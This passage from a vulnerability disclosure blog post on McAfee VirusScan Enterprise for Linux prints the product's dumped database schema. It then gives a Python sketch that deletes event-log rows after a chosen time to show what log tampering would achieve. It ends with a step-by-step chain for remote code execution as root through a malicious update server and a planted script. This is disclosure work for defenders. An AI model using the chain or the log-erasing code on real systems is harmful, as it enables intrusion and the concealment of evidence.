<p>The schema of this database is:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">"*"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"4"</span><span class="p">,</span><span class="nv">"create table nailsInfo(attrib varchar(32) not null unique,	-- name of the attribute
                          val varchar(32),			-- string value
			  i_val integer				-- integer value
			 )"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(nailsInfo autoindex 1)"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"3"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"counters"</span><span class="p">,</span><span class="nv">"counters"</span><span class="p">,</span><span class="nv">"5"</span><span class="p">,</span><span class="nv">"create table counters(i_lastUpdated integer not null, 	-- time the counters were last updated
			 i_scanned integer not null,		-- Number of objects scanned 
			 i_totalScanCpu integer not null,	-- Total CPU used for scanning (microseconds) 
			 i_excludes integer not null,		-- Number of excluded files 
			 i_ok integer not null,			-- Number of files scanned to be ok 
			 i_infected integer not null,		-- Number of objects that have been infected 
			 i_infections integer not null,		-- Number of of infections 
			 i_cleaned integer not null,		-- Number of objects that have been cleaned 
			 i_cleanAttempts integer not null,	-- Number of objects that have been queued for cleaning 
			 i_cleanRequests integer not null,	-- Number of clean requests from the scan sources 
			 i_repaired integer not null,		-- Number of repairs made 
			 i_possiblyCleaned integer not null,	-- Number of partial repairs made 
			 i_errors integer not null,		-- Number of failed scans not clean and not infected 
			 i_timeouts integer not null,		-- Number of scans that have timed out 
			 i_denied integer not null,		-- Number of process denied access 
			 i_deleted integer not null,		-- Number of cleans that resulted in deleting the file 
			 i_renamed integer not null,		-- Number of cleans that resulted on renaming the file 
			 i_quarantined integer not null,	-- Number of cleans that resulted on quarantining the file 
			 i_corrupted integer not null,		-- Number of corrupted items detected by scanning 
			 i_encrypted integer not null,		-- Number of encrypted items detected by scanning 
			 i_uptime integer not null,		-- Number of seconds since we started 
			 i_wait integer not null,		-- Number of objects waiting to be scanned 
			 i_busy integer not null,		-- Number of objects being scanned 
			 i_adds integer not null,		-- Number of objects that have been added to a queued entry 
			 i_cacheSize integer not null,		-- Number of entries in the cache 
			 i_cacheHits integer not null,		-- Number of cache hits 
			 i_cacheMisses integer not null,	-- Number of cache misses 
			 i_cacheInserts integer not null	-- Number of cache insertions 
			)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"9"</span><span class="p">,</span><span class="nv">"create table schedule(i_taskId integer primary key,    	-- an auto-increment column
                         taskName varchar(64) not null unique,	-- the name of the task
			 timetable varchar(255) not null,	-- the encoded string of when it runs
			 taskType varchar(16) not null,		-- upgrade, scan, report
			 taskInfo varchar(255),			-- information specific to the task
			 taskResults varchar(255),		-- results of the task
			 i_lastRun integer,			-- time last run
			 status varchar(8),			-- status of last run
			 progress varchar(255),			-- progress string
			 i_duration integer,			-- current duration of the task run
			 i_nextRun integer,			-- time next run
			 i_recurrenceCounter integer,		-- count scheduler invocations by cron
			 i_taskPid integer			-- pid of the task being run
			)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(schedule autoindex 1)"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"8"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"12"</span><span class="p">,</span><span class="nv">"create table errorClass(errorClsNm varchar(16) not null unique)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(errorClass autoindex 1)"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"11"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"repository"</span><span class="p">,</span><span class="nv">"repository"</span><span class="p">,</span><span class="nv">"15"</span><span class="p">,</span><span class="nv">"create table repository(siteList blob, status int)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"scanLog"</span><span class="p">,</span><span class="nv">"scanLog"</span><span class="p">,</span><span class="nv">"16"</span><span class="p">,</span><span class="nv">"create table scanLog(i_logId integer primary key, 		-- an auto-increment column
			origin varchar(8) not null,		-- access or demand
			i_taskId integer,			-- references schedule.i_taskId
			i_objId integer,			-- an id to relate scan events on the same object
			i_tim integer not null,			-- UTC time it happened
			fileName varchar(255), 
			path varchar(255), 
			action varchar(16),
			virusName varchar(64),
			virusType varchar(16),			-- Unknown, Virus, App, Joke, Killed, Test, Trojan, Wannabee
			userName varchar(32),
			processName varchar(32)
		       )"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"eventLog"</span><span class="p">,</span><span class="nv">"eventLog"</span><span class="p">,</span><span class="nv">"18"</span><span class="p">,</span><span class="nv">"create table eventLog(i_logId integer primary key,		-- an auto-increment column
                         origin varchar(8) not null,		-- system or task
			 i_taskId varchar(64),			-- references schedule.i_taskId
			 i_objId integer,			-- an id to relate events on the same object
			 i_tim integer not null,		-- UTC time it happened
			 errorClsNm varchar(16), 		-- references errorClass.errorClsNm
			 i_errorCode integer,			-- the error code
			 errorType varchar(8),			-- info or error
			 description varchar(255)
			)"</span>
</code></pre></div></div>
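<p>To see what log tampering would amount to, the <code class="language-plaintext highlighter-rouge">eventLog</code> table can be recreated from the dumped schema in a local, in-memory SQLite database using Python’s standard <code class="language-plaintext highlighter-rouge">sqlite3</code> module. This sketch only shows the effect of a <code class="language-plaintext highlighter-rouge">delete</code> on a local copy. It makes no claim about how such a statement would be passed through the web interface’s <code class="language-plaintext highlighter-rouge">db</code> command syntax. The function name and the sample rows are made up for illustration.</p>

```python
import sqlite3

# eventLog definition copied from the schema dump above (comments omitted)
EVENT_LOG_DDL = """
create table eventLog(i_logId integer primary key,
                      origin varchar(8) not null,
                      i_taskId varchar(64),
                      i_objId integer,
                      i_tim integer not null,
                      errorClsNm varchar(16),
                      i_errorCode integer,
                      errorType varchar(8),
                      description varchar(255))
"""


def erase_events_since(conn: sqlite3.Connection, since: int) -> int:
    """Delete every event logged at or after `since` (UTC seconds); return the count."""
    cur = conn.execute("delete from eventLog where i_tim >= ?", (since,))
    conn.commit()
    return cur.rowcount


conn = sqlite3.connect(":memory:")
conn.execute(EVENT_LOG_DDL)
conn.executemany(
    "insert into eventLog(origin, i_tim, errorType, description) values (?, ?, ?, ?)",
    [("system", 100, "info", "made-up entry"), ("task", 200, "info", "made-up entry")],
)
```

<p>Because <code class="language-plaintext highlighter-rouge">i_tim</code> is stored as UTC seconds, removing everything after the time of compromise takes a single range predicate.</p>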

<hr />

<h3 id="bringing-it-all-together-remote-code-execution-as-root">Bringing it all Together: Remote Code Execution as Root</h3>
<p>To execute code as the root user on a remote machine:</p>
<ol>
  <li>Brute-force an authentication token using <a href="#vuln7">Vulnerability 7</a> and <a href="#vuln8">Vulnerability 8</a>.</li>
  <li>Start running a malicious update server.</li>
  <li>Send a request with the authentication token to point the target’s update server setting at the malicious server, using <a href="#vuln7">Vulnerability 7</a>.</li>
  <li>Force the target to create a malicious script on its system using <a href="#vuln6">Vulnerability 6</a>.</li>
  <li>Send a malformed request with the authentication token that starts a virus scan but executes the malicious script instead, using <a href="#vuln5">Vulnerability 5</a> and <a href="#vuln6">Vulnerability 6</a>.</li>
  <li>The malicious script is then run by the root user on the victim machine.</li>
</ol>

<p><em>Exploiting this chain depends on the existence of a valid login token, which is generated whenever a user logs into the web interface. These tokens are valid for approximately an hour after login.</em></p>

<h4 id="demo">Demo</h4>
<script src="https://gist.github.com/e8339d700a42416bd83cb1cf0a05e624.js"> </script>]]></content><author><name>Andrew Fasano</name></author><category term="Vulnerability Research" /><category term="McAfee" /><category term="Linux" /><category term="CVE" /><summary type="html"><![CDATA[A system running Intel’s McAfee VirusScan Enterprise for Linux can be compromised by remote attackers due to a number of security vulnerabilities. Some of these vulnerabilities can be chained together to allow remote code execution as root.]]></summary></entry></feed>